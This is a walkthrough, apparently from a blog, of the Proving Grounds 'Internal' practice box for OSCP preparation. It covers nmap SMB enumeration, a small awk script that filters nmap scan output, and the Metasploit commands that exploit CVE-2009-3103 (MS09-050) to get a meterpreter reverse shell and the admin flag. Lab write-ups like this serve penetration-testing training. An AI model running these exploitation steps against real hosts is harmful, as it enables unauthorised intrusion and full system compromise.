Internal — Proving Grounds OSCP prep (practice, easy)

Mr-Intern, published in System Weakness, Dec 16, 2021


This is a walkthrough for Offensive Security's Internal box on their paid subscription service, Proving Grounds.

First things first

Connect to the VPN:

sudo openvpn ~/Downloads/pg.ovpn

*start up target machine on proving grounds site*

Set the target IP in a shell variable:

target="192.168.105.40"

Enumeration

Initial nmap scan:

nmap $target -sV -sC -oN nmap_1

Next, we enumerate SMB further with the smb-vuln NSE scripts (the pattern is quoted so the shell does not expand it):

nmap --script "smb-vuln*" -p 139,445 -oN smb-vuln-scan $target

Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)

As you can see from the NSE script output, there is a vulnerability we can make use of: CVE-2009-3103 (MS09-050, the SMBv2 negotiate vulnerability). Next, we will look for an exploit written for it.
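A saved smb-vuln scan gets long once several scripts report, so here is a small shell helper (an added example, not part of the original walkthrough) that reads nmap -oN output and lists only the script blocks whose State is VULNERABLE, together with their CVE ids. The sample output is constructed in the shape of nmap's host script results; the script name, CVE and advisory number are the ones the scan above reported, the other entries are filler.

```shell
#!/bin/sh
# Added example: triage "nmap --script smb-vuln*" normal output, e.g. when
# checking your own hosts before and after patching.

# Constructed sample in the shape of nmap's host script output (not the
# author's real scan; nmap's longer description text is omitted).
SAMPLE_NMAP_OUTPUT='Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|     Disclosure date: 2009-09-08
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms10-061:
|   Constructed entry of the kind shown with vulns.showall
|_    State: NOT VULNERABLE
|_smb-vuln-ms10-054: false'

# Reads nmap normal output on stdin; prints "<script-name> <CVE ids>" for
# every script block whose State is VULNERABLE or LIKELY VULNERABLE.
vulnerable_scripts() {
    awk '
        # "| smb-vuln-x:" or "|_smb-vuln-x: false" opens a new script block
        /^\|[_ ]smb-vuln-/ {
            name = $0
            sub(/^\|[_ ]/, "", name); sub(/:.*/, "", name)
            vuln = 0; ids = "-"
        }
        # "State: NOT VULNERABLE" does not match this pattern
        /State: (LIKELY )?VULNERABLE/ { vuln = 1 }
        /IDs:/ { ids = $0; sub(/.*IDs:[ \t]*/, "", ids); gsub(/CVE:/, "", ids) }
        # "|_" marks the last line of a block: report it if it was flagged
        /^\|_/ && name != "" { if (vuln) print name, ids; name = "" }
        END { if (name != "" && vuln) print name, ids }
    '
}

# Usage on a saved scan:  vulnerable_scripts < smb-vuln-scan
printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | vulnerable_scripts
```

Run against the file written by -oN above; the filter keeps the smb-vuln-cve2009-3103 block and drops the "false" and NOT VULNERABLE entries.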

Exploitation

After several attempts at using the non-Metasploit exploits, I gave up and used Metasploit. There were other exploits that offered RCE as well, but they were poorly written and not EDB verified. The official Proving Grounds write-up for this box uses a Metasploit module as well, so I suspect the talented folks over at Offensive Security had similar issues ;)

msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target-ip>
set LHOST <local-ip>
run

Now, you should have a meterpreter shell.

Post-Exploitation

You should have full privileges now. You will find the flag, proof.txt, on the Administrator's desktop.

Happy hacking, and good luck on your OSCP journey. If you want to see mine, check out my Noob to OSCP vlog. If you found this guide useful, please throw me some claps or a follow, because it makes me happy :)
